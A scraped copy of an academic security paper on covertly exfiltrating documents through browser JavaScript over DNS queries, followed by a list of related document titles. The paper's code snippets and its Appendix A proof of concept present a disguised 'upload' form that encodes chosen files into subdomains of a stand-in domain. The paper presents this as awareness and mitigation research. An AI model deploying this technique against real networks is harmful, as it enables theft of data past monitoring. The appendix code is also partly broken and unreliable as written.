Browser-Based Covert Data Exfiltration
|
|
|
- Aron Houston
- 9 years ago
- Views:
Transcription
1 Browser-Based Covert Data Exfiltration Kenton Born Kansas State University Abstract Current best practices heavily control user permissions on network systems. This effectively mitigates many insider threats regarding the collection and exfiltration of data. Many methods of covert communication involve crafting custom packets, typically requiring both the necessary software and elevated privileges on the system. By exploiting the functionality of a browser, covert channels for data exfiltration may be created without additional software or user privileges. This paper explores novel methods of using a browser s JavaScript engine to exfiltrate documents over the Domain Name System (DNS) protocol without sending less covert Hypertext Transfer Protocol (HTTP) requests. Introduction Covert channels are often mitigated by monitoring network traffic and enforcing a policy of least privileges on company systems. Firewalls and network intrusion detection systems (NIDS) greatly reduce covert channel possibilities by detecting and preventing protocols that are against the network policy. However, most networks must allow HTTP, SMTP, and DNS communication between internal hosts and external servers. While HTTP and SMTP are heavily monitored, DNS is often only investigated when NIDS detect anomalous behavior. DNS and HTTP are transactional protocols that work hand-in-hand to provide the functionality necessary for internet browsing. Before resources can be requested through HTTP, the web server's domain must be resolved to an IP address by first sending a DNS query to the authoritative name server for that domain. A fully qualified domain name (FQDN) is formed through a series of labels that separate it into subdomains, each one controlled by the subdomain to its right. RFC 1035 specifies the allowable characters as a-z, 0-9, and dashes (Mockapetris 1987). Additionally, the RFC limits the labels to 63 octets or less, with the full domain being 255 octets or less. DNS tunnels are often built by embedding data in the lower level domains (LLDs) of queries to a name server. The name server can then decode the data in the LLD and reply to the host by embedding data or commands in the DNS response. Similarly, HTTP offers bi-directional tunneling possibilities through methods such as request parameters, custom headers, and cookies. Channels of this type are known as covert storage channels because there is a storage location written to and read from. Covert timing channels, on the other hand, involve transmitting information through time values corresponding to the same response (Cabuk et al. 2009). DNS and HTTP may be used for covert timing channels by altering the timing between requests, or at even lower layers in the protocol stack by altering the timing or ordering of individual packets (El-Atawy and Al-Shaer 2009). However, most of these methods presented require additional software and elevated privileges.
2 Related Work HTTP is the most commonly used method of bypassing restrictive network policies. GNU httptunnel is an example of a tunnel that allows protocols to be embedded inside HTTP requests and responses (httptunnel 2008). Hauser (Hauser 1998) explored covert shell exploitation by using HTTP request parameters to build a Reverse WWW Shell, providing command and control channels to the internal system. A privacy-based approach was analyzed in by Bauer (Bauer 2003) where an anonymous overlay network was developed using embedded cookies, redirects, and active content. An innovative method of bypassing website restrictions was explored using a tool known as Infranet (Feamster et al. 2002). Censored web pages were steganographically tunneled inside images and extracted at the client. Lack of monitoring has lead to DNS tunnels such as Iodine, Dns2tcp, and TCP-over-DNS growing in popularity (TCP-Over-DNS 2008; Dembour 2008; Iodine 2009). Covert storage channels from the client to the server are created by encoding data into the lower level domains of DNS, while responses are typically sent by storing data in TXT or NULL record types. Although many detection strategies have been developed, few tools are available for DNS tunnel detection. Multiple methods of creating and detecting storage timing channels was explored by Cabuk (Cabuk et al. 2004; Cabuk et al. 2009). One popular method involves encoding data in the interarrival time between packets, while another strategy uses an interval-based arrival time approach. While covert timing channels are the most difficult to detect, they offer little bandwidth when compared to covert storage channels. Data Exfiltration Over DNS DNS-based data exfiltration may be accomplished without additional software or user privileges by quickly implementing Javascript in a text editor that can be launched in the system s browser. This will leave only a small, overwriteable fingerprint on the file system. However, fine-grained control of DNS is not provided by the JavaScript API. An approach must be used that effectively separates DNS requests from HTTP requests, preventing the latter from ever being sent. Additionally, some form of bi-directional communication would be desired to provide robustness and reliability to the covert channel. Both of these objectives can be accomplished using many different features of modern browsers. To exfiltrate documents over DNS using JavaScript, the file must first be read from the local system and turned into a binary string, optionally compressing or encrypting it in the process. The data must then be encoded using the allowable DNS characters specified in RFC 1035 (Mockapetris 1987). This can be accomplished using a modified version of base32 or base64 encoding. The final data representation may then be broken into segments that can be exfiltrated in separate DNS queries. An example framework for accomplishing these steps using Firefox is provided in Appendix A. DNS Prefetching In order to build a covert DNS channel without sending HTTP requests, the two protocols must be separated using client-side JavaScript. While the language does not offer this type of fine-grained access to the protocols, several tricks may be used to generate the desired functionality.
3 The simplest method of creating custom DNS queries is through the DNS prefetching functionality that is now implemented in most browsers by default. Prefetching allows websites to pre-resolve IP addresses for domains that the user will likely visit while browsing the website. This increases the responsiveness of future resources, allowing HTTP requests to immediately be sent to the prefetched domains. Below, an example is provided that can be added to the "head" section of an HTML document to prefetch an IP address for a domain: <link rel="dns-prefetch" href=" While this method is simple and effective, there are flaws in using this approach for data exfiltration. Dynamically generating and adding prefetch links to the head section of a document real-time does not work in some browsers. A new HTML document must be created and opened after generating the necessary link elements. This adds unnecessary steps to data exfiltration. A more effective method may be implemented by taking advantage of the DNS prefetching of anchor elements. When an anchor element is added to the body of an HTML document, a DNS query will be sent to resolve the IP address of the domain in the "href" attribute. This may be exploited by dynamically creating anchor elements with JavaScript, replacing the LLD a controlled (or monitored) domain with the data that should be exfiltrated to the DNS server. To prevent NIDS from triggering on a threshold limit (for instance, warning about a denial-ofservice attack), the JavaScript should add a delay between requests. While JavaScript does not have a "sleep" functionality to appropriately space out the DNS requests, it can created in two ways. Firstly, one can create a "sleep" function using the "Date" object and a while loop. However, this requires unecessary resources in a spin lock. Alternatively, the "settimeout" function can be used, recursively calling itself as if in a loop. Below, example code is provided that demonstrates this approach: var body = document.getelementsbytagname('body')[0]; function generatequeries() { if(!islastquery()) settimeout(generatequeries, 1000); var anchor = document.createelement('a'); anchor.href = generatenextlld() + '.' + domain + '/' + resource; body.appendchild(anchor); generatequeries(); Separating DNS from HTTP Because DNS prefetching can be disabled, alternative methods may be necessary to exfiltrate data. Using custom JavaScript, it is possible to separate DNS queries from HTTP requests without exploiting prefetching. When the 'src' attribute of a dynamically created object is set (for instance, on a new "img" object), it will first create a DNS query to obtain the IP address for the provided domain. This is followed by an HTTP request for the resource at that domain. The script will not continue to execute until a response to the DNS query is received. There are two strategies that can be used to separate the HTTP request from the DNS query. Firstly, the name server can be instructed to return an "NXDomain" response for each request (decoding the LLD in the process). When this response is returned to the script, the code will
4 continue to execute without sending an HTTP request. However, this method will generate a heavy amount of "NXDomain" replies, which may alert cybersecurity if packets are sent too frequently. Also, some combinations of browsers and settings will attempt to resolve these domains several times by retrying with IPv6 and prepending "www" to the domain name. However, some of these settings may be altered through the browser without additional privileges (for example, by typing "about:config" in the Firefox URL bar). Note that the "NXDomain" behavior mimics the behavior of a legimate name server, making it unnecessary to own the domain if the traffic to legimate sites is observable. Alternatively, a more covert method involves sending requests to a controlled domain that does not reply to the DNS requests (a black hole). This may force the NIDS to drop the connection after a timeout, failing to report it as an "NXDomain" response. However, this strategy has the problem of halting the JavaScript code while waiting for the DNS response. This can be mitigated by using JavaScript's "settimeout(function,millis)" method once again to recursively call a query generation method as follows: function generatequeries() { if(!islastquery()) settimeout(generatenextquery,1000); var img = document.createelement('img'); img.src = generatenextlld() + '.' + domain + '/' + resource; When the src attribute is set, the JavaScript will halt while waiting for a reply. However, the timeout will re-invoke the function without the previous instance ever completing. This will, in turn, generate the next packet and allow progress continue as if it was in a packet generation loop. However, it must be noted that some setups will prevent too many outstanding DNS requests (most commonly set at eight), which will mitigate the bandwidth of the tunnel. Many browsers will also repeat these queries before progress continues. Bi-directional Storage and Timing Channels Instead of using a constant delay between DNS queries (as seen in the examples above), data may also be encoded in the inter-arrival time between queries. This can be done by replacing the timeout time with a function that computes the desired time between sent packets. Alternatively, the constant timeout time can be used and followed with a conditional test that determines whether or not a packet should be sent for that interval. While Cabuk (Cabuk et al. 2004; Cabuk et al. 2009) shows that these two basic methods can be detected using statistical methods, much more complex timing channels can be built off these building blocks that simulate typical traffic patterns and delays. Similar to clients, the name servers may use covert timing channels to communicate with the client by altering the time between responses. This can analyzed client-side by checing the 'Date' object before the query is sent and again after the DNS response is returned. The Date object provides clock accuracy to the nearest millisecond. This bi-directional channel may be used for sending commands back to the client or for adding reliability feedback from the server. However, tools such as Traffic Controller (Wang 2009) can be used to mitigate covert timing channels by altering the timing of delivered packets at a position between the client and server. Unless delay was added that exceeds the threshold of the tool, a covert timing channel would be defeated. However, tools such as Traffic Controller are restricted from adding significant delays to traffic due to decreased browsing speeds for legitimate users.
5 The server can alternatively create a storage covert channel through clever use of DNS responses. When the generatequeries function is called, it can check whether or not the previous response was received or not by altering an array of booleans after the src attribute is set. This provides the server a 1-bit per response channel to communicate with the client by alternating between NXDomain responses and not sending a response. A simplified version of accomplishing this is presented below: function generatequeries(seq) { if(!islastquery()) settimeout(generatequeries, generatenexttimeout(), (seq+1)); var img = document.createelement('img'); img.src = generatenextlld() + '.' + domain + '/' + resource; receivedqueries[seq] = true; //only called when NXDomain is returned! It should be noted that maintaining an array after the 'src' attribute is set may also be used for adding reliability to NXDomain channels. Before the next packet is generated, a simple check can be performed whether or not a response was received for previous requests. If a response was not received and the previous iteration timed out, the query can be resent. Note that when the browser is restricted to a certain number of outstanding requests (commonly eight), this will restrict the bandwidth of a black-hole tunnel. Conclusions and Future Work This work presents several novel methods of covertly exfiltrating data without elevated privileges on a system. It is important to note that this research is done in the attitude of raising awareness as opposed to benefiting individuals with malicious intent. This work is presented in hopes that the methods proposed may be mitigated through increased monitoring and awareness. It has been shown above that covert DNS channels created through client-side JavaScript are a threat to network security. This problem is not easily addressed through privilege management. Instead, it must be mitigated through increased monitoring and awareness of the threat. Firstly, multiple methods were shown that separate DNS queries from HTTP requests. These varied in implementation and level of covertness. It was also shown how they could be combined to provide a bi-directional covert channel between the client and server. Secondly, it was shown how these methods could be altered to build covert timing channels through DNS queries and responses, also allowing bi-directional communication between the client and server. Appendex A shows a proof-of-concept client framework for implementing many of these ideas. Future work will explore how these techniques can be combined with popular website traffic to provide an extra layer of covertness and additional bandwidth. A strategy for mitigating and monitoring this threat will also be developed by analyzing best practices for DNS tunnel detection against common data exfiltration scenarios.
6 Appendix A Client Framework <html> <head> <script> var domain = "mydomain.com"; var LLD_size = 50; var body = document.getelementsbytagname('body')[0]; function sendqueries(argsarray) { var queries = argsarray[0]; var query_num = argsarray[1]; if( (query_num+1) < queries.length) settimeout(sendqueries, getnextdelay(), [queries, query_num+1]); if(query_num < queries.length) { var anchor = document.createelement('a'); var before_date = new Date(); anchor.href = queries[query_num]; var after_date = new Date(); interpretdelay(after_date before_date); body.appendchild(anchor); function exfiltratefiles(files) { for(var i=0; i < files.length; i++) { var binstring = files[i].getasbinary(); var dnsstring = base64(encrypt(compress(binstring))); var numpackets = Math.ceil(dnsString.length/LLD_size); var queries = new Array(); var beginindex; var endindex; for(var i=0; i < numpackets; i++) { beginindex = i * LLD_size; endindex = beginindex + LLD_size; if(endindex < dnsstring.length) endindex = data.length; var nextlld = addsequencing(data.substring(beginindex, endindex)); queries[i] = nextlld + '.' + domain + '/' + generatefakeresource(); var argsarray = [queries, 1]; sendqueries(argsarray); </script> </head> <body> <center> <p>please choose a document to upload </p> <form id="file_form" method=post enctyp="multiparty/form-data"> <input type=file id="input" multiple="true /> <input type=button name="submit" value="submit" onclick="exfiltratefiles(document.getelementbyid('input').files)" /> </form> </body> </html>
7 Works Cited Bauer, M. (2003), New covert channels in HTTP: Adding unwitting web browsers to anonymity sets, In Proceedings of the ACM Workshop on Privacy in the Electronic Society (WPES'03), Cabuk, S., Brodley, C. E., and Shields, C. (2009), IP covert channel detection, ACM Trans. Inf. Syst. Secur., 12 (4): Cabuk, S., Brodley, C. E., and Shields, C. (2004), IP covert timing channels: design and detection, In Proceedings of the 11th ACM Conference on Computer and Communications Security, Oct Washington DC, USA. CCS '04. ACM, New York, NY. Dembour, O. (2008), 'Dns2tcp', Nov El-Atawy, A. And Al-Shaer, E. (2009), "Building Covert Channels over the Packet Reordering Phenomenon," The 28 th Conference on Computer Communications, IEEE (INFOCOM' 2009), Apr 19-25, 2009, Feamster, N., Balazinska, M., Harfst, G., Balakrishnan, H., and Karger, D. (2002), 'Infranet: Circumventing Censorship and Surveillance'. In Proceedings of the 11th USENIX Security Symposium Aug 5-9, San Francisco, CA. Hauser, V. (1998), 'Placing backdoors through firewalls', 27 April 'httptunnel', June 2008 'Iodine', June 2009 Mockapetris, P. (1987), 'RFC Domain names - implementation and specification', November 'TCP-over-DNS tunnel software HOWTO', July Wang, Yi et al. (2009), "Traffic Controller: A Practical Approach to Block Network Covert Timing Channel. Availability," Reliability and Security, 2009 (ARES '09), Mar ,
Detecting DNS Tunnels Using Character Frequency Analysis
Detecting DNS Tunnels Using Character Frequency Analysis Kenton Born Kansas State University [email protected] Dr. David Gustafson Kansas State University [email protected] Abstract High-bandwidth covert channels
Web. Services. Web Technologies. Today. Web. Technologies. Internet WWW. Protocols TCP/IP HTTP. Apache. Next Time. Lecture #3 2008 3 Apache.
JSP, and JSP, and JSP, and 1 2 Lecture #3 2008 3 JSP, and JSP, and Markup & presentation (HTML, XHTML, CSS etc) Data storage & access (JDBC, XML etc) Network & application protocols (, etc) Programming
Project 4: IP over DNS Due: 11:59 PM, Dec 14, 2015
CS168 Computer Networks Jannotti Project 4: IP over DNS Due: 11:59 PM, Dec 14, 2015 Contents 1 Introduction 1 2 Components 1 2.1 Creating the tunnel..................................... 2 2.2 Using the
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
Data Exfiltration and DNS
WHITE PAPER Closing back-door access to your sensitive data Introduction DNS hasn t changed all that much since Paul Mockapetris invented it in 1983. It still addresses exactly the same requirement stated
INTRUSION DECEPTION CZYLI BAW SIĘ W CIUCIUBABKĘ Z NAMI
INTRUSION DECEPTION CZYLI BAW SIĘ W CIUCIUBABKĘ Z NAMI Na przykładzie Junos WebApp Secure Edmund Asare INCONVENIENT STATISTICS 70% of ALL threats are at the Web application layer. Gartner 73% of organizations
Uploaded images filter evasion for carrying out XSS attacks
February 25, 2007 Uploaded images filter evasion for carrying out XSS attacks Digitаl Security Research Group (DSecRG) Alexander Polyakov [email protected] http://dsecrg.ru Table of contents Introduction...3
EE 7376: Introduction to Computer Networks. Homework #3: Network Security, Email, Web, DNS, and Network Management. Maximum Points: 60
EE 7376: Introduction to Computer Networks Homework #3: Network Security, Email, Web, DNS, and Network Management Maximum Points: 60 1. Network security attacks that have to do with eavesdropping on, or
DEERFIELD.COM. DNS2Go Update API. DNS2Go Update API
DEERFIELD.COM DNS2Go Update API DNS2Go Update API DEERFIELD.COM PRODUCT DOCUMENTATION DNS2Go Update API Deerfield.com 4241 Old U.S. 27 South Gaylord, MI 49686 Phone 989.732.8856 Email [email protected]
Project 2: Web Security Pitfalls
EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course
WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
DNS Pinning and Web Proxies
DNS Pinning and Web Proxies An NGSSoftware Insight Security Research (NISR) Publication 2007 Next Generation Security Software Ltd Abstract DNS-based attacks can be used to perform a partial breach of
Bypassing firewalls Another hole in the wall ;-) [email protected] Présentation pour «La nuit du hack» le 13 Juin 2009
Bypassing firewalls Another hole in the wall ;-) [email protected] Présentation pour «La nuit du hack» le 13 Juin 2009 Agenda 1. SSH, HTTP(S) proxy: old school and advanced 2. Tunnels and covert channels:
Reverse Shells Enable Attackers To Operate From Your Network. Richard Hammer August 2006
Reverse Shells Enable Attackers To Operate From Your Network Richard Hammer August 2006 Reverse Shells? Why should you care about reverse shells? How do reverse shells work? How do reverse shells get installed
Application-layer protocols
Application layer Goals: Conceptual aspects of network application protocols Client server paradigm Service models Learn about protocols by examining popular application-level protocols HTTP DNS Application-layer
Covert Channels. Some instances of use: Hotels that block specific ports Countries that block some access
Covert Channels Covert Channels Tunnels that are used to bypass filters and intrusion detection systems Use traffic that is thought to be something else (i.e. DNS tunnels) Can also provide encryption (i.e.
Web Application Security
E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor s Summary
1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained
home Network Vulnerabilities Detail Report Grouped by Vulnerability Report Generated by: Symantec NetRecon 3.5 Licensed to: X Serial Number: 0182037567 Machine Scanned from: ZEUS (192.168.1.100) Scan Date:
Further web design: HTML forms
Further web design: HTML forms Practical workbook Aims and Learning Objectives The aim of this document is to introduce HTML forms. By the end of this course you will be able to: use existing forms on
Phishing by data URI
Phishing by data URI Henning Klevjer [email protected] October 22, 2012 1 Abstract Historically, phishing web pages have been hosted by web servers that are either compromised or owned by the attacker.
Cross Site Scripting Prevention
Project Report CS 649 : Network Security Cross Site Scripting Prevention Under Guidance of Prof. Bernard Menezes Submitted By Neelamadhav (09305045) Raju Chinthala (09305056) Kiran Akipogu (09305074) Vijaya
Configuring iplanet 6.0 Web Server For SSL and non-ssl Redirect
Introduction Configuring iplanet 6.0 Web Server For SSL and non-ssl Redirect This document describes the process for configuring an iplanet web server for the following situation: Require that clients
How To Understand A Network Attack
Network Security Attack and Defense Techniques Anna Sperotto (with material from Ramin Sadre) Design and Analysis of Communication Networks (DACS) University of Twente The Netherlands Attacks! Many different
c. Write a JavaScript statement to print out as an alert box the value of the third Radio button (whether or not selected) in the second form.
Practice Problems: These problems are intended to clarify some of the basic concepts related to access to some of the form controls. In the process you should enter the problems in the computer and run
Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst
INTEGRATED INTELLIGENCE CENTER Technical White Paper William F. Pelgrin, CIS President and CEO Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst This Center for Internet Security
Chapter 11 Phase 5: Covering Tracks and Hiding
Chapter 11 Phase 5: Covering Tracks and Hiding Attrition Web Site Contains an archive of Web vandalism attacks http://www.attrition.org/mirror/attrition Most attackers, however, wish to keep low profile
What is Web Security? Motivation
[email protected] http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
Novell Identity Manager
AUTHORIZED DOCUMENTATION Manual Task Service Driver Implementation Guide Novell Identity Manager 4.0.1 April 15, 2011 www.novell.com Legal Notices Novell, Inc. makes no representations or warranties with
Enabling WISPr (Hotspot Services) in the ZoneDirector
A P P L I C A T I O N N O T E Enabling WISPr ( Services) in the Introduction This document describes the WISPr support (hotspot service) for. Unauthenticated users: The users who have not passed authentication
Check list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
Session Hijacking Exploiting TCP, UDP and HTTP Sessions
Session Hijacking Exploiting TCP, UDP and HTTP Sessions Shray Kapoor [email protected] Preface With the emerging fields in e-commerce, financial and identity information are at a higher risk of being
DEPLOYMENT GUIDE Version 1.1. Deploying the BIG-IP LTM v10 with Citrix Presentation Server 4.5
DEPLOYMENT GUIDE Version 1.1 Deploying the BIG-IP LTM v10 with Citrix Presentation Server 4.5 Table of Contents Table of Contents Deploying the BIG-IP system v10 with Citrix Presentation Server Prerequisites
Hushmail Express Password Encryption in Hushmail. Brian Smith Hush Communications
Hushmail Express Password Encryption in Hushmail Brian Smith Hush Communications Introduction...2 Goals...2 Summary...2 Detailed Description...4 Message Composition...4 Message Delivery...4 Message Retrieval...5
SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.
system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. From a high-level standpoint, attacks on computer systems and networks can be grouped
Comparison of Firewall, Intrusion Prevention and Antivirus Technologies
White Paper Comparison of Firewall, Intrusion Prevention and Antivirus Technologies How each protects the network Juan Pablo Pereira Technical Marketing Manager Juniper Networks, Inc. 1194 North Mathilda
SECURE APPLICATION DEVELOPMENT CODING POLICY OCIO-6013-09 TABLE OF CONTENTS
OFFICE OF THE CHIEF INFORMATION OFFICER OCIO-6013-09 Date of Issuance: May 22, 2009 Effective Date: May 22, 2009 Review Date: TABLE OF CONTENTS Section I. PURPOSE II. AUTHORITY III. SCOPE IV. DEFINITIONS
Cyber Security Workshop Ethical Web Hacking
Cyber Security Workshop Ethical Web Hacking May 2015 Setting up WebGoat and Burp Suite Hacking Challenges in WebGoat Concepts in Web Technologies and Ethical Hacking 1 P a g e Downloading WebGoat and Burp
How to Configure Captive Portal
How to Configure Captive Portal Captive portal is one of the user identification methods available on the Palo Alto Networks firewall. Unknown users sending HTTP or HTTPS 1 traffic will be authenticated,
CSCI110: Examination information.
CSCI110: Examination information. The exam for CSCI110 will consist of short answer questions. Most of them will require a couple of sentences of explanation of a concept covered in lectures or practical
Network-Enabled Devices, AOS v.5.x.x. Content and Purpose of This Guide...1 User Management...2 Types of user accounts2
Contents Introduction--1 Content and Purpose of This Guide...........................1 User Management.........................................2 Types of user accounts2 Security--3 Security Features.........................................3
Pwning Intranets with HTML5
Javier Marcos de Prado Juan Galiana Lara Pwning Intranets with HTML5 2009 IBM Corporation Agenda How our attack works? How we discover what is in your network? What does your infrastructure tell us for
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
Chapter 8 Router and Network Management
Chapter 8 Router and Network Management This chapter describes how to use the network management features of your ProSafe Dual WAN Gigabit Firewall with SSL & IPsec VPN. These features can be found by
Alteon Global Server Load Balancing
Alteon Global Server Load Balancing Whitepaper GSLB Operation Overview Major Components Distributed Site Monitoring Distributed Site State Protocol Internet Topology Awareness DNS Authoritative Name Server
HTTPS Inspection with Cisco CWS
White Paper HTTPS Inspection with Cisco CWS What is HTTPS? Hyper Text Transfer Protocol Secure (HTTPS) is a secure version of the Hyper Text Transfer Protocol (HTTP). It is a combination of HTTP and a
THE SMARTEST WAY TO PROTECT WEBSITES AND WEB APPS FROM ATTACKS
THE SMARTEST WAY TO PROTECT WEBSITES AND WEB APPS FROM ATTACKS INCONVENIENT STATISTICS 70% of ALL threats are at the Web application layer. Gartner 73% of organizations have been hacked in the past two
CTF Web Security Training. Engin Kirda [email protected]
CTF Web Security Training Engin Kirda [email protected] Web Security Why It is Important Easiest way to compromise hosts, networks and users Widely deployed ( payload No Logs! (POST Request Difficult to defend
DNS REBINDING DENIS BARANOV, POSITIVE TECHNOLOGIES
DNS REBINDING DENIS BARANOV, POSITIVE TECHNOLOGIES TABLE OF CONTENTS 1 Bypassing The Restrictions 3 2 Putting It into Practice 5 3 Actual Load 7 4 Detection Of The Application Version 5 Guessing A/The
The following multiple-choice post-course assessment will evaluate your knowledge of the skills and concepts taught in Internet Business Associate.
Course Assessment Answers-1 Course Assessment The following multiple-choice post-course assessment will evaluate your knowledge of the skills and concepts taught in Internet Business Associate. 1. A person
The SSL device also supports the 64-bit Internet Explorer with new ActiveX loaders for Assessment, Abolishment, and the Access Client.
WatchGuard SSL v3.2 Release Notes Supported Devices SSL 100 and 560 WatchGuard SSL OS Build 355419 Revision Date January 28, 2013 Introduction WatchGuard is pleased to announce the release of WatchGuard
Glossary of Technical Terms Related to IPv6
AAAA Record An AAAA record stores a 128-bit Internet Protocol version 6 (IPv6) address, which does not fit the standard A record format. For example, 2007:0db6:85a3:0000:0000:6a2e:0371:7234 is a valid
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications Slides by Connor Schnaith Cross-Site Request Forgery One-click attack, session riding Recorded since 2001 Fourth out of top 25 most
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
Barracuda Intrusion Detection and Prevention System
Providing complete and comprehensive real-time network protection Today s networks are constantly under attack by an ever growing number of emerging exploits and attackers using advanced evasion techniques
DDOS WALL: AN INTERNET SERVICE PROVIDER PROTECTOR
Journal homepage: www.mjret.in DDOS WALL: AN INTERNET SERVICE PROVIDER PROTECTOR Maharudra V. Phalke, Atul D. Khude,Ganesh T. Bodkhe, Sudam A. Chole Information Technology, PVPIT Bhavdhan Pune,India [email protected],
TCP/IP Networking, Part 2: Web-Based Control
TCP/IP Networking, Part 2: Web-Based Control Microchip TCP/IP Stack HTTP2 Module 2007 Microchip Technology Incorporated. All Rights Reserved. Building Embedded Web Applications Slide 1 Welcome to the next
Single Pass Load Balancing with Session Persistence in IPv6 Network. C. J. (Charlie) Liu Network Operations Charter Communications
Single Pass Load Balancing with Session Persistence in IPv6 Network C. J. (Charlie) Liu Network Operations Charter Communications Load Balancer Today o Load balancing is still in use today. It is now considered
DoS/DDoS Attacks and Protection on VoIP/UC
DoS/DDoS Attacks and Protection on VoIP/UC Presented by: Sipera Systems Agenda What are DoS and DDoS Attacks? VoIP/UC is different Impact of DoS attacks on VoIP Protection techniques 2 UC Security Requirements
REAL-TIME WEB APPLICATION PROTECTION. AWF SERIES DATASHEET WEB APPLICATION FIREWALL
REAL-TIME WEB APPLICATION PROTECTION. AWF SERIES DATASHEET WEB APPLICATION FIREWALL AWF Series Web application firewalls provide industry-leading Web application attack protection, ensuring continuity
External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
Computer Networks 1 (Mạng Máy Tính 1) Lectured by: Dr. Phạm Trần Vũ MEng. Nguyễn CaoĐạt
Computer Networks 1 (Mạng Máy Tính 1) Lectured by: Dr. Phạm Trần Vũ MEng. Nguyễn CaoĐạt 1 Lecture 10: Application Layer 2 Application Layer Where our applications are running Using services provided by
Customer Tips. Xerox Network Scanning HTTP/HTTPS Configuration using Microsoft IIS. for the user. Purpose. Background
Xerox Multifunction Devices Customer Tips June 5, 2007 This document applies to these Xerox products: X WC Pro 232/238/245/ 255/265/275 for the user Xerox Network Scanning HTTP/HTTPS Configuration using
Client-side Web Engineering From HTML to AJAX
Client-side Web Engineering From HTML to AJAX SWE 642, Spring 2008 Nick Duan 1 What is Client-side Engineering? The concepts, tools and techniques for creating standard web browser and browser extensions
Intell-a-Keeper Reporting System Technical Programming Guide. Tracking your Bookings without going Nuts! http://www.acorn-is.
Intell-a-Keeper Reporting System Technical Programming Guide Tracking your Bookings without going Nuts! http://www.acorn-is.com 877-ACORN-99 Step 1: Contact Marian Talbert at Acorn Internet Services at
M3-R3: INTERNET AND WEB DESIGN
M3-R3: INTERNET AND WEB DESIGN NOTE: 1. There are TWO PARTS in this Module/Paper. PART ONE contains FOUR questions and PART TWO contains FIVE questions. 2. PART ONE is to be answered in the TEAR-OFF ANSWER
Attack and Defense Techniques
Network Security Attack and Defense Techniques Anna Sperotto, Ramin Sadre Design and Analysis of Communication Networks (DACS) University of Twente The Netherlands Attack Taxonomy Many different kind of
OWASP Application Security Building and Breaking Applications
OWASP Application Security Building and Breaking Applications Rochester OWASP Chapter - Durkee Consulting, Inc. [email protected] Who's? Principal Security Consultant Durkee Consulting Inc. Founder of Rochester
Application Firewall Configuration Examples
SonicOS Application Firewall Configuration Examples This technote describes practical usage examples with the SonicOS Application Firewall (AF) feature introduced in SonicOS Enhanced 4.0. The Application
Deploying F5 with Microsoft Active Directory Federation Services
F5 Deployment Guide Deploying F5 with Microsoft Active Directory Federation Services This F5 deployment guide provides detailed information on how to deploy Microsoft Active Directory Federation Services
Vulnerabilità dei protocolli SSL/TLS
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Dipartimento di Informatica e Comunicazione Vulnerabilità dei protocolli SSL/TLS Andrea Visconti Overview Introduction
Data leakage is a serious threat to many organizations. Can Content-Based Data Loss Prevention Solutions Prevent Data Leakage in Web Traffic?
DATA LEAKS Can Content-Based Data Loss Prevention Solutions Prevent Data Leakage in Web Traffic? David Gugelmann ETH Zurich Pascal Studerus AdNovum Informatik AG Vincent Lenders armasuisse Bernhard Ager
Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com
SAINT Integrated Network Vulnerability Scanning and Penetration Testing www.saintcorporation.com Introduction While network vulnerability scanning is an important tool in proactive network security, penetration
Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
Gigabyte Content Management System Console User s Guide. Version: 0.1
Gigabyte Content Management System Console User s Guide Version: 0.1 Table of Contents Using Your Gigabyte Content Management System Console... 2 Gigabyte Content Management System Key Features and Functions...
IBM Protocol Analysis Module
IBM Protocol Analysis Module The protection engine inside the IBM Security Intrusion Prevention System technologies. Highlights Stops threats before they impact your network and the assets on your network
Criteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
Installation and configuration guide
Installation and Configuration Guide Installation and configuration guide Adding X-Username support to Forward and Reverse Proxy TMG Servers Published: December 2010 Applies to: Winfrasoft X-Username for
Web Foundations Series Internet Business Associate
Web Foundations Series Internet Business Associate Internet Business Associate prepares students to work effectively in today's business environment. In this course, you will learn about the tasks involved
